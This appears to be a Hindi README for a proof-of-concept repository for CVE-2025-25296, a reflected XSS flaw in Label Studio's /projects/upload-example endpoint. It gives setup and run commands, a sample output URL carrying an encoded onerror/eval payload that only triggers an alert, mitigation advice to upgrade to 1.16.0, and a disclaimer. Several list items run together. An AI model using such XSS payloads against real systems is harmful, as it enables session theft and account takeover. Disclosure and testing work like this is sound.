
CVE-2025-25296 भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (POC), जो Label Studio के 1.16.0 से पहले के संस्करणों को प्रभावित करती है।
यह प्रोजेक्ट Label Studio, एक ओपन-सोर्स डेटा लेबलिंग टूल, को प्रभावित करने वाली CVE-2025-25296 भेद्यता के लिए एक प्रूफ ऑफ कॉन्सेप्ट (POC) प्रदर्शित करता है। यह भेद्यता /projects/upload-example एंडपॉइंट में मौजूद है, जो GET अनुरोधों में उपयोगकर्ता-प्रदत्त HTML सामग्री को सैनिटाइज़ करने में विफल रहता है। यह हमलावरों को पीड़ित के ब्राउज़र में मनमाना JavaScript निष्पादित करने की अनुमति देता है, जिससे संभावित क्रॉस-साइट स्क्रिप्टिंग (XSS) हमले हो सकते हैं।
/projects/upload-example एंडपॉइंट1.16.0 या उसके बाद के संस्करण में अपडेट करेंअस्थायी वर्कअराउंड के रूप में:
/projects/upload-example एंडपॉइंट का उपयोग करने से बचें।setup.sh का उपयोग करके pip के माध्यम से इंस्टॉल किए गए)poc.py: भेद्यता का शोषण करने और XSS हमले को प्रदर्शित करने के लिए Python स्क्रिप्ट।setup.sh: Docker का उपयोग करके कमजोर वातावरण सेट अप करने की स्क्रिप्ट।इस रिपॉजिटरी को क्लोन करें:
git clone CVE-2025-25296-POC
cd CVE-2025-25296-POC
सेटअप स्क्रिप्ट चलाएँ:
chmod +x setup.sh
./setup.sh
सेटअप स्क्रिप्ट निम्न कार्य करेगी:
1.15.0) को पुल करना।localhost:8080 पर कमजोर Label Studio इंस्टेंस चलाना।एक्सप्लॉइट स्क्रिप्ट चलाएँ:
python poc.py
स्क्रिप्ट निम्न कार्य करेगी:
/projects/upload-example एंडपॉइंट पर एक क्राफ्टेड GET अनुरोध भेजना।XSS अलर्ट को देखने के लिए प्रदान किए गए URL को वेब ब्राउज़र में खोलें।
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
इस भेद्यता को कम करने के लिए:
1.16.0 या उसके बाद के संस्करण में अपडेट करें।यह प्रोजेक्ट केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसका उपयोग जिम्मेदारी से और केवल उन्हीं सिस्टम पर करें जिन पर आपके पास स्पष्ट अनुमति हो। इस टूल का अनधिकृत उपयोग लागू कानूनों का उल्लंघन कर सकता है।